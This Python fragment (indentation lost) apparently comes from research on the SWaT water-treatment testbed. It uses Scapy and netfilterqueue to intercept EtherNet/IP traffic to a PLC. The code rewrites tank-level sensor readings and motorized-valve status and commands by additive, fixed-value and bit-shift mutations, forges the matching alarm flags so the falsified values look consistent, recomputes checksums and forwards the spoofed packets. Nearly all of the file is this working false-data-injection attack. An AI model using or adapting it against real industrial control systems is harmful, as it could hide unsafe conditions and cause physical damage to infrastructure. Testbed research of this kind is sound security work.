def produce():
while True:
if off:
print('putting -1')
q.put(-1)
return
# craft a packet
i = 1
pkt = IP() / TCP()
# pkt.src = i * 100
# pkt.dst = i * 200
# if you modify something, call show2 to recalculate everything
pkt.show2()
q.put(pkt)
sleep(.5)
def __extract(packet):
global mutation
global value
global device
# global src
# global dst
pkt = IP(packet.get_payload())
if 'LIT' in device:
#LIT mutation
if (str(pkt.src) == '192.168.1.30' and enip_tcp.ENIP_SendRRData in pkt and str(pkt.dst) == '192.168.1.10'):
ind = device.index('LIT')
mut = mutation[ind]
val = value[ind]
if SWAT_LIT in pkt:
true_value_tank = inthexToHex(pkt[SWAT_LIT].Pv)
if mut in ('ASD','ALD','ARD'):
mutate_value_tank = true_value_tank + val
elif mut in ('STZ','STO','STS'):
mutate_value_tank = val
elif mut == 'BSL':
shift = rol(pkt[SWAT_LIT].Pv,val,32)
mutate_value_tank = inthexToHex(shift)
elif mut == 'BSR':
shift = ror(pkt[SWAT_LIT].Pv,val,32)
mutate_value_tank = inthexToHex(shift)
pkt[SWAT_LIT].Pv = hexTointhex(mutate_value_tank)
pkt[SWAT_LIT].Sim_Pv = hexTointhex(mutate_value_tank)
# set correct alarms for mutated value
if int(float(mutate_value_tank)) < 250:
pkt[SWAT_LIT].control = 1
pkt[SWAT_LIT].AHH = 0
pkt[SWAT_LIT].AH = 0
pkt[SWAT_LIT].AL = 1
pkt[SWAT_LIT].ALL = 1
elif int(float(mutate_value_tank)) < 800:
pkt[SWAT_LIT].control = 1
pkt[SWAT_LIT].AHH = 0
pkt[SWAT_LIT].AH = 0
pkt[SWAT_LIT].AL = 1
pkt[SWAT_LIT].ALL = 0
elif int(float(mutate_value_tank)) > 1200:
pkt[SWAT_LIT].control = 1
pkt[SWAT_LIT].AHH = 1
pkt[SWAT_LIT].AH = 1
pkt[SWAT_LIT].AL = 0
pkt[SWAT_LIT].ALL = 0
elif int(float(mutate_value_tank)) > 1000:
pkt[SWAT_LIT].control = 1
pkt[SWAT_LIT].AHH = 0
pkt[SWAT_LIT].AH = 1
pkt[SWAT_LIT].AL = 0
pkt[SWAT_LIT].ALL = 0
del pkt[TCP].chksum # Need to recompute checksum
del pkt[IP].chksum
pkt.show2()
packet.set_payload(str(pkt)) #manipulated packet
spoofed_measurement = inthexToHex(pkt[SWAT_LIT].Sim_Pv)
print('Changed packet from LIT %1.4f to %1.4f ' % (true_value_tank,spoofed_measurement))
print ("PKT from %s to %s" %(pkt.src,pkt.dst))
if 'MV' in device:
# MV Mutation
if (str(pkt.src) == '192.168.1.20' and enip_tcp.ENIP_SendRRData in pkt and str(pkt.dst) == '192.168.1.10'):
ind = device.index('MV')
mut = mutation[ind]
val = value[ind]
if SWAT_MV in pkt:
true_value_motor = pkt[SWAT_MV].status
if mut in ('ASD','ALD','ARD'):
mutate_value_motor = true_value_motor + val
if mutate_value_motor > 255:
mutate_value_motor = 255
elif mutate_value_motor < 0:
mutate_value_motor = 0
elif mut in ('STZ','STO','STS'):
mutate_value_motor = val
if mutate_value_motor > 255:
mutate_value_motor = 255
elif mutate_value_motor < 0:
mutate_value_motor = 0
elif mut == 'BSL':
shift = rol(pkt[SWAT_MV].status,val,8)
mutate_value_motor = shift
elif mut == 'BSR':
shift = ror(pkt[SWAT_MV].status,val,8)
mutate_value_motor = shift
pkt[SWAT_MV].status = mutate_value_motor
pkt[SWAT_MV].cmd = mutate_value_motor
del pkt[TCP].chksum # Need to recompute checksum
del pkt[IP].chksum
pkt.show2()
packet.set_payload(str(pkt)) #manipulated packet
spoofed_measurement = pkt[SWAT_MV].status
print('Changed packet from MV %1.4f to %1.4f ' % (true_value_motor,spoofed_measurement))
print ("packet from %s to %s" %(pkt.src,pkt.dst))
# then, let the netfilterqueue forward the packet
packet.accept()
